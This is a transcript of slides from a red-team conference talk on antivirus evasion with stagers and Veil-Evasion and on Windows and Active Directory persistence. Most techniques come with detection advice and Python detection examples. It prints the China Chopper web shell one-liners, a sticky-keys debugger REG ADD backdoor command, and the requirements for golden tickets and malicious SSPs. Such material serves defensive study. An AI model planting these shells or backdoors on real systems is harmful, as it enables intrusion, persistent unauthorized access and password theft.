This talk goes over different techniques to evade detection by antivirus programs, talks about how Veil-Evasion evades the programs, and shows an AV signature bypass. It also then documents a large number of techniques on how actors can persist in networks.
2. Christopher Truncer
Previous Systems Administrator turned Red Teamer
Red Team Lead at Mandiant
Florida State Seminole
Open Source Developer
@ChrisTruncer
3. What’s this talk about?
◉ How Stagers Work
◉ Case Study: Bypassing a Signature
◉ The Right Way to do Detection
◉ Persistence - lots of it! :)
◉ Old School and New School Techniques
◉ Persistence Detection
◉ Questions
5. Antivirus Evasion
◉ White hats and attackers need to evade
antivirus
◉ Evading to establish immediate C&C of
compromised system
◉ Also used to maintain access on a system/in a
network
6. Antivirus Evasion
◉ If required to use an executable, we’ll use a
stager
◉ Stager - Veil-Evasion or MSFVenom output
◉ Inject shellcode into memory
◉ Shellcode will download and inject a reflective dll
◉ A “loader” for your real malware
7. Stagers
◉ Stagers can be developed in any language that
can interact with the Windows functions
◉ It’s not hard to write a stager
○ Just four function calls
8. Stagers
◉ Allocate memory to store shellcode, and set the
proper memory permissions
◉ Copy shellcode into the allocated memory
◉ Create a thread to execute the shellcode
◉ Have code wait until thread is done executing
14. Approaches to Bypassing AV
◉ Ghost code / net no-operation code
◉ Encrypted binaries
○ Hyperion
◉ Custom Code
15. Veil’s Approach
◉ Fight on-disk detection through different
techniques
○ Obfuscated code
○ Encrypted code
○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.
○ Shellcode-less binaries
17. Veil’s Approach
◉ Using a language that’s not C or C# made a large
difference
○ AV programs didn’t know or couldn’t properly inspect
non-standard languages
◉ Example:
○ C vs. Python
23. Veil Module
◉ Add a little complexity, so it isn’t just easily
obvious what is happening
◉ What about encrypting the code?
◉ What about making the tool brute-force its own
key?
24. Stallion
◉ Generate a random encryption key, that is
artificially constrained
○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567
◉ Test for a known string with decryption key
○ If it doesn’t match, it’s the wrong key
○ If it matches, decrypt the shellcode and inject it into memory
29. Signature Bypass
◉ I was excited to see if someone finally figured
Veil-Evasion out
○ It is open source…
◉ Previous attempts have turned out fairly
humorous
40. Persistence Purposes
◉ Persistence is commonly used for one of two
purposes:
○ Persisting on a host
○ Persisting a network
◉ A lot of the techniques I will cover can facilitate
access for both purposes
41. Persisting Hosts
◉ When persisting a host, an attacker is looking for
ad-hoc, or programmatically defined access, to a
system
○ Attackers want this as close to on-demand as possible
◉ The efforts undertaken by an attacker are
directed to maintaining access to a specific host
42. Persisting Hosts
◉ What’s needed for persisting hosts?
○ Survive Reboots
■ Probably the most important concept
○ Have administrative rights on the system
○ Complement network based persistence
43. Persisting Networks
◉ Network based persistence in two contexts
○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose isn’t
for access to host, but the network
○ Used to maintain access into different networks
■ Don’t want to be VLANed off in a VOIP network
44. Persisting Networks (continued)
◉ What are other network based persistence options?
○ Attackers can use persistence not only to maintain access to
a network, but also to obtain their required domain
permissions on-demand
○ Access likely facilitated through a host-based persistence
technique
46. Web Shells
◉ Funny, this seems trivial and too easy that no one
would ever use this…
◉ ...that’s not the case
○ China Chopper - APT17, APT19, APT22
○ ITSecShell, reDuh, ASPShell
○ Even commodity code
47. China Chopper
◉ Very tiny webshell, about 4 KB stored server side
◉ Developed in a variety of languages
○ CFM
○ ASP
○ PHP
○ Etc.
◉ A client application is used to interact with the
webshell
48. China Chopper Server Code
◉ ASP
○ <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
◉ PHP
○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
50. China Chopper
◉ Really useful features in China Chopper
○ File Explorer
○ Upload/Download files
○ Mod file timestamp attributes
○ Database client - MSSQL, MySQL
○ Command shell
51. Web Shell Prevention & Detection
◉ Hunt/Sweep for known bad files
○ Hashes, or other file based indicators
◉ Blacklist all filetypes except expected files for
upload functionality
◉ Don’t allow your web server to execute files
uploaded from untrusted sources
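As an added example (not from the talk or from any tool it mentions), a Python hunt over a web root that applies both checks from this slide: a list of known-bad file hashes and content patterns that match the China Chopper one-liners shown above. The directory contents and the hash-list entry are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# Constructed indicators (not real case data): the two China Chopper one-liners shown
# above as content patterns, plus a hash list that would normally come from your own cases.
WEBSHELL_PATTERNS = {
    "chopper_aspx": re.compile(rb"eval\s*\(\s*Request\.Item\s*\[[^\]]+\]\s*,\s*[\"']unsafe[\"']", re.I),
    "chopper_php": re.compile(rb"@?eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I),
}
CHOPPER_PHP = b"<?php @eval($_POST['password']);?>"
CHOPPER_ASPX = b'<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>'
KNOWN_BAD_SHA256 = {hashlib.sha256(CHOPPER_PHP).hexdigest()}  # constructed "known bad" entry

def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_webroot(root, exts=(".php", ".asp", ".aspx", ".cfm", ".jsp")):
    """Return [(path, reason)] for script files matching a known-bad hash or a shell pattern."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            digest = sha256_of(path)
            if digest in KNOWN_BAD_SHA256:
                hits.append((path, "known-bad hash " + digest))
                continue  # hash match is conclusive; no need to pattern-scan
            with open(path, "rb") as f:
                data = f.read()
            for label, pattern in WEBSHELL_PATTERNS.items():
                if pattern.search(data):
                    hits.append((path, label))
                    break
    return hits

def demo():
    """Constructed web root: a benign page plus the two shells; returns the sorted hit reasons."""
    root = tempfile.mkdtemp()
    for rel, body in {"index.php": b"<?php echo 'hi'; ?>", "img/cache.php": CHOPPER_PHP,
                      "upload/x.aspx": CHOPPER_ASPX}.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as f:
            f.write(body)
    return sorted(reason for _, reason in scan_webroot(root))
```

The hash check catches exact copies of a known shell; the pattern check is what still fires when the attacker changes the parameter name or adds whitespace.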
52. Magic Packet
◉ Or “how to access port 12345 with a packet to
port 443”
◉ The attacker’s problem:
○ Compromised a web server (port 80 and 443 are in use)
○ Firewall(s) prevent connection to any other port
○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell
53. Magic Packet
◉ Run backdoor listening on port 12345
◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets
○ When a SYN packet is received with a specific signature,
change destination port from 443 to 12345
○ Windows network stack then delivers the packet to port 12345
○ Malware alters the port in all subsequent packets for the
stream
55. Magic Packet - Defenses
◉ This malware was installed via a custom
compiled executable
○ Application Whitelisting
○ Device Guard
56. Outlook
◉ Outlook rules can help provide a very unique
on-demand foothold onto a host
◉ Silent Break wrote a post on leveraging Outlook
rules to gain access to a user’s system
◉ Provides access immediately when Outlook
triggers the rule
57. Outlook
◉ Attacker creates an Outlook rule to execute a
binary when the “trigger” subject is received
◉ Attacker will sync the rule against the target
user’s account
◉ Send an e-mail with the trigger in the subject
◉ Get shell :)
60. Outlook - Additional Tweaks
◉ Have another rule auto-delete the incoming
e-mail to prevent user detection of the trigger
○ https://silentbreaksecurity.com/malicious-outlook-rules/
61. Outlook - Detection
◉ Honestly, not certain on the best means to detect
this at scale
◉ Primary IOC is to execute a program when
receiving an e-mail
○ I don’t know of any legit use cases for this
63. Registry Hacks
◉ This is the 101 method for persistence that almost
everyone learns
◉ Extremely easy to set up, and can be installed
with a range of permissions
64. Registry Hacks
◉ These can be configured to run when the system
starts, or a user logs into the system
○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
◉ These methods are highly publicized and well
known.
◉ Defensive tools look for these
65. Registry Hacks - Takeaway
◉ These can be good for maintaining initial access,
but not for long term use
◉ SOCs - you want to have the ability to detect
these
66. Startup Folder
◉ Your system will execute files in the startup
folder
○ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
67. Scheduled Tasks
◉ Scheduled tasks are an easy way for a user of
any level to persist on a system
◉ With the proper permissions, you can schedule a
task up to the SYSTEM level
◉ This is Microsoft’s recommendation/alternative
to using “at” jobs
68. Scheduled Tasks
◉ Scheduled tasks can be created from the
command line with schtasks.exe or the GUI
◉ Tasks can run at startup, when a user logs into
the system, after the system has been idle, etc.
◉ Tasks can run binaries, PowerShell one-liners,
and more
71. Scheduled Tasks - Detection
◉ Obtain a baseline of the scheduled tasks set to
run on your systems
○ Schtasks /query
○ Task scheduler
○ Etc.
◉ Audit systems and identify deviations from your
baseline
72. Service Manipulation
◉ Services usually run with SYSTEM level
permissions, so they can be juicy targets for attackers
◉ Easy way to install service based persistence?
Check service binary write permissions!
74. Service Manipulation
◉ Now that you’ve found services that can be
modified, you just need a service binary.
○ Veil-Evasion, PowerUp, custom code
◉ Save the original service binary
◉ Bounce the box (or service) if required
75. Sticky Keys
◉ With administrative access to a machine, you can
easily setup sticky keys
○ Copy sethc.exe
○ Copy cmd.exe to C:\Windows\System32\sethc.exe
○ Reboot, and hit shift five times
77. Sticky Keys - Another Method
◉ Set cmd.exe as the debugger for sethc.exe
◉ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
78. Sticky Keys - Another Method
◉ Main problem - doesn’t require authentication
◉ If using Sticky Keys, ensure it’s calling back to a
location you control, vs. opening up the system
for everyone
79. Sticky Keys - Detection
◉ Compare known good sethc.exe binary hash with
systems’ current sethc.exe binary
◉ Ensure no registry key is added defining a
debugger for sethc.exe
81. DLL Search Order Hijack
◉ DLL search order hijacking exploits how Windows
searches for DLLs when loading an executable
◉ Specifically, it exploits the fact that Windows will
always search the current folder of the
executable for a DLL
82. DLL Search Order Hijack
◉ Sample in CAPEC
○ If you drop ntshrui.dll within C:\Windows and run
explorer.exe, you can get the dll within C:\Windows to be
executed
◉ This exploits the order in which the dll is
searched for on a Windows system
83. DLL Search Order Hijack
◉ Attackers create malicious DLLs that exploit this
search order to get their DLL to run on a system
◉ Since it’s every time the application runs, it can be
used as a persistence technique
◉ PowerUp can be used to find these opportunities
84. DLL Search Order Hijack
◉ Used by the following actors:
○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26
◉ Used by the following malware:
○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
85. Legitimate Scheduled Tasks
◉ Easy to identify scheduled tasks named “Evil task”
◉ First we must look at how investigators detect malicious
scheduled tasks
86. Legitimate Scheduled Tasks
◉ Stacking tasks across multiple systems to determine
anomalous tasks
◉ Parse task scheduler log (schedLgu.txt)
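The baseline check from the “Scheduled Tasks - Detection” slide and the stacking from this one, as an added Python example that is not from the talk: it parses task lists in the shape of `schtasks /query /fo CSV` output, counts how many hosts carry each task name, and diffs one host against an approved baseline. The host names, task names and CSV rows are constructed.

```python
import csv
import io
from collections import Counter

# Constructed sample data in the shape of `schtasks /query /fo CSV` output
# (TaskName, Next Run Time, Status). The task names are illustrative, not captured output.
HEADER = '"TaskName","Next Run Time","Status"'

def _csv(*tasks):
    return "\n".join([HEADER] + [f'"{t}","N/A","Ready"' for t in tasks]) + "\n"

COMMON = ["\\Microsoft\\Windows\\Defrag\\ScheduledDefrag", "\\GoogleUpdateTaskMachineUA"]
ODD_ONE = "\\Microsoft\\Windows\\UpdateOrchestrator\\Reboot_Helper"  # constructed, blends in by name
SAMPLE = {
    "WS01": _csv(*COMMON),
    "WS02": _csv(*COMMON, "\\Adobe Acrobat Update Task"),
    "WS03": _csv(*COMMON),
    "SRV01": _csv(*COMMON, "\\Adobe Acrobat Update Task", ODD_ONE),
}

def parse_schtasks_csv(text):
    """Return the set of task names; schtasks repeats the header per folder, so skip those rows."""
    names = set()
    for row in csv.DictReader(io.StringIO(text)):
        name = row.get("TaskName")
        if name and name != "TaskName":
            names.add(name)
    return names

def stack_tasks(per_host):
    """Count on how many hosts each task name appears (the 'stacking' step)."""
    counts = Counter()
    for names in per_host.values():
        counts.update(names)
    return counts

def outliers(per_host, max_hosts=1):
    """Task names seen on at most max_hosts hosts, mapped to the hosts that have them."""
    counts = stack_tasks(per_host)
    return {t: sorted(h for h, n in per_host.items() if t in n)
            for t, c in counts.items() if c <= max_hosts}

def baseline_deviations(baseline, observed):
    """Per-host check against an approved baseline: what was added and what is missing."""
    return {"added": sorted(observed - baseline), "missing": sorted(baseline - observed)}

def demo():
    per_host = {host: parse_schtasks_csv(text) for host, text in SAMPLE.items()}
    return outliers(per_host), baseline_deviations(set(COMMON), per_host["SRV01"])
```

Stacking surfaces the task that exists on one host only even though its name imitates a Microsoft folder; the baseline diff is what you run per image once a baseline has been approved.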
87. Legitimate Scheduled Tasks
◉ What if we modify existing legit scheduled tasks?
○ Specifically tasks that are not required for Windows
functionality
88. Unquoted Service Paths
◉ Unquoted service paths exploit a vulnerability in
the order that Windows searches for a binary
when a space is in an unquoted path
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
89. Unquoted Service Paths
◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
○ C:\Program.exe
○ C:\Program Files(x86)\Steam\Steam.exe
○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
◉ Three opportunities
90. Unquoted Service Paths
◉ If we have write access to any of the paths that
Windows looks for, we can hijack the service
○ Just need a service binary
◉ Drop it into any of the paths on the previous slide,
and restart the service
○ Might need to wait for a reboot
91. Unquoted Service Paths - Prevention
◉ Check service binaries on your images and
determine if any are using unquoted service
paths.
◉ Make sure the paths aren’t writable to
non-admins.
◉ PowerUp can find these as well
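An added Python example (not the talk’s or PowerUp’s code) that generalizes the three-candidate expansion from the previous slides to any unquoted ImagePath and flags the candidates whose directory is writable. The service entries and the writable-directory list are constructed, and each ImagePath is assumed to hold just the executable path with no trailing arguments.

```python
import ntpath

# Constructed ImagePath values in the form found under
# HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath; not read from a real host.
SAMPLE_SERVICES = {
    "SteamSvc": r"C:\Program Files(x86)\Steam\Steam Gaming\steam.exe",            # the slide's path
    "AgentSvc": r'"C:\Program Files\Vendor\Agent Service\agent.exe" -service',  # quoted: safe
    "Spooler": r"C:\Windows\System32\spoolsv.exe",                               # no spaces: safe
}
WRITABLE_DIRS = [r"C:\Program Files(x86)\Steam"]  # constructed: pretend Users can write here

def search_candidates(image_path):
    """Every path Windows tries, in order, when starting the service binary.
    A quoted path is taken literally. An unquoted path with spaces is cut at each
    space, and .exe is appended to any prefix that has no extension."""
    if image_path.startswith('"'):
        return [image_path[1:].split('"', 1)[0]]
    if " " not in image_path:
        return [image_path]
    parts = image_path.split(" ")
    candidates = []
    for i in range(1, len(parts) + 1):
        prefix = " ".join(parts[:i])
        if i < len(parts) and not ntpath.splitext(prefix)[1]:
            prefix += ".exe"
        candidates.append(prefix)
    return candidates

def hijackable(image_path, writable_dirs):
    """Candidates (other than the real binary) that sit in a directory a non-admin can write;
    on a live system you would test write access instead of consulting a constructed list."""
    writable = {d.lower().rstrip("\\") for d in writable_dirs}
    return [c for c in search_candidates(image_path)[:-1]
            if ntpath.dirname(c).lower().rstrip("\\") in writable]

def audit(services, writable_dirs):
    """Report only services whose ImagePath is unquoted and contains a space."""
    findings = {}
    for name, path in services.items():
        if path.startswith('"') or " " not in path:
            continue
        findings[name] = {"candidates": search_candidates(path),
                          "hijackable": hijackable(path, writable_dirs)}
    return findings
```

Quoting the path in the service definition, which the audit treats as safe, is the fix; the writable-directory check tells you which findings are exploitable today rather than merely untidy.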
93. WMI Requirements - Event Filter
◉ The WMI query that fires upon an event occurring
○ Usually, an event class derived from
__InstanceModificationEvent, __InstanceCreationEvent, or
__InstanceDeletionEvent
94. WMI Requirements - Event Consumer
◉ There are five different event consumers
○ The most interesting one is “CommandLineEventConsumer”
◉ These “consume” or act on events that occur
95. WMI Requirements - Filter/Consumer Binding
◉ This associates a WMI Event Filter with the Event
Consumer
96. WMI - Persistence
◉ PowerSploit’s persistence module for WMI
○ Automates the creation process
○ Will create a permanent WMI event subscription
97. PowerShell Profiles
◉ Anytime PowerShell runs, it will execute code in
the default profile
◉ Create profile code here:
○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1
98. PowerShell Profiles
◉ Use standard persistence mechanism to execute
PowerShell silently
○ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden
○ It’s a legit exe!
100. Security Support Provider
◉ A Security Support Provider (SSP) - a security
package
○ An extension used to perform authentication during
client/server exchange
◉ An Authentication Package (AP)
○ Extends interactive login authentication
○ Example: RSA tokens
101. Security Support Provider
◉ SSP/AP
○ Can serve tasks of SSPs and APs - loaded into lsass at boot
○ Example: Kerberos and msv1_0 (NTLM)
102. Security Support Provider
◉ Install your own SSP that is loaded into lsass.exe
◉ Can develop your own SSP DLL
◉ Use Persistence module in PowerSploit to install
your malicious SSP
103. Security Support Provider
◉ Ben Delpy (@gentilkiwi) added SSP functionality
into mimilib.dll
○ Once installed and loaded into lsass.exe, it captures
plaintext passwords
106. Excel Magic
◉ Malicious macro executes backdoor
◉ How can you ensure persistence?
○ Most users will run Excel once a day
○ You can use any “old school” techniques to spawn Excel
○ Disable macro settings to run macro without user prompt
107. Excel Magic
◉ Registry modification that opens specific
Workbook upon starting Excel
○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Excel\Security\Trusted Locations
○ Just add the location
112. Golden Tickets
◉ Method was developed with Ben Delpy and Sean
Metcalf
◉ Forges a “golden” Kerberos ticket which can be
good for 10 years!
◉ Golden tickets provide on-demand domain
privilege “upgrades” for any group within the
domain
113. Golden Tickets
◉ Only need four pieces of information
○ Domain SID
○ Name of the domain
○ User you want to create a ticket for
○ Krbtgt account hash
◉ You can build your ticket at home, offline
117. Golden Ticket Takeaways
◉ If impersonating an account, tickets are still valid
even if password changes
◉ Valid for as long as you specify (10 year default)
◉ Domain trusts
○ Child domains can compromise the parent
◉ Only way to stop is change krbtgt hash… twice…
◉ Or rebuild from bare metal
118. Account Checkout - Case Study
◉ Client had account checkout system for domain
administrator accounts
◉ Only two users with access to checkout system
◉ System requires 2FA
◉ DA access is lost if user changes their
password/pin/token
◉ Users can see checked out accounts
120. Account Checkout - Case Study
◉ Persist domain administrator without getting
caught
○ Can’t continuously check out accounts
◉ Password vault permissions were managed
through Active Directory groups
○ Tons of them
121. Account Checkout - Case Study
◉ Copy group memberships to a compromised
user account
○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed
without needing access to their Password Vault
124. Conclusions
◉ Persistence will remain rampant
◉ Always new and creative ways to maintain
persistence
◉ Understanding persistence techniques is critical
to detecting attacker access